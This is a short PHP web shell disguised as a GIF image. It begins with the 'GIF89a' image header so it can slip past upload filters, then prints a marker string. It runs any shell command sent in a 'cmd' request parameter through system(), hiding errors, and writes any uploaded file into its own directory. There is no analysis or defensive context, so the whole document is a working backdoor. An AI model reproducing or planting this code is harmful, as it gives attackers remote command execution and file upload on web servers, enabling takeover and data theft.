GIF89a
<?php
echo("JEMBOT");
if(isset($_POST['cmd'])){ echo "<pre>"; @system($_POST['cmd']); echo "</pre>"; exit; }
if(isset($_GET['cmd'])){ echo "<pre>"; @system($_GET['cmd']); echo "</pre>"; exit; }
if(isset($_FILES['file'])){
    $d=dirname(__FILE__)."/";
    $f=basename($_FILES["file"]["name"]);
    if(move_uploaded_file($_FILES["file"]["tmp_name"],$d.$f)){
        echo "OK: $f";
        @chmod($d.$f,0644);
    } else echo "Upload failed";
    exit;
}
?>